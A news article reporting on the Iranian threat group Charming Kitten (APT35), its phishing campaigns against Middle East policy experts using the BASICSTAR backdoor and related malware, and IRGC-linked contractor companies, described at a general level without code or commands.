Charming Kitten (APT35): Iranian Hackers Target Middle East Policy Experts

charming kitten apt35

Charming Kitten, also known as APT35, CharmingCypress, Mind Sandstorm, TA453, and Yellow Garuda, is an Iranian-origin threat actor group that has been linked to a new series of cyberattacks targeting Middle East policy experts. These attacks involve the deployment of a new backdoor named BASICSTAR through a fake webinar portal.

Charming Kitten is notorious for employing sophisticated social engineering tactics, often engaging targets in prolonged email conversations before sending malicious links. Recent attacks, discovered by Volexity researchers Ankur Saini, Callum Roxan, Charlie Gardner, and Damien Cash, have targeted high-profile individuals working on Middle Eastern affairs.

The attacks, believed to be orchestrated by individuals affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), utilize various backdoors such as MischiefTut, MediaPl (EYEGLASS), PowerLess, BellaCiao, POWERSTAR (GorjolEcho), and NokNok. These cyber campaigns demonstrate the group’s persistence and adaptability despite previous exposure.

Phishing attempts observed between September and October 2023 involved Charming Kitten posing as the Rasanah International Institute for Iranian Studies (IIIS) to establish trust with targets. The attackers employed compromised email accounts and multiple threat-actor-controlled email accounts, a tactic known as Multi-Persona Impersonation (MPI).

The attack chains typically begin with RAR archives containing LNK files distributed via email, enticing recipients to join fake webinars on topics relevant to their interests. One such infection sequence deploys BASICSTAR and KORKULOADER, a PowerShell downloader script, capable of gathering system information, executing remote commands, and downloading decoy PDF files.

lnk file

Notably, the phishing attacks tailor their payload based on the target’s operating system, with Windows users receiving POWERLESS and Apple macOS users being targeted with NokNok through a VPN application laced with malware.

Researchers emphasize Charming Kitten’s commitment to surveillance and manipulation of targets, highlighting the group’s extensive campaign activity and dedicated human operators.

These revelations coincide with Recorded Future’s discovery of IRGC’s targeting of Western countries through a network of contracting companies specializing in surveillance and offensive technologies. These companies, including Ayandeh Sazan Sepher Aria, DSP Research Institute, Sabrin Kish, Soroush Saman, Mahak Rayan Afraz, and Parnian Telecommunication and Electronic Company, are closely associated with the IRGC and serve as conduits for cyber operations.

The relationship between these Iranian contracting companies and the IRGC underscores the regime’s concerted efforts to conceal its cyber activities and export offensive technologies to countries such as Iraq, Syria, and Lebanon.

Overall, the emergence of BASICSTAR and Charming Kitten’s continued cyber operations highlight the persistent threat posed by Iranian-affiliated threat actors to regional stability and global cybersecurity.

1 thought on “Charming Kitten (APT35): Iranian Hackers Target Middle East Policy Experts”

  1. Pingback: Meta Expose 8 Spyware Companies Targeting PC's and Mobiles

Comments are closed.

Scroll to Top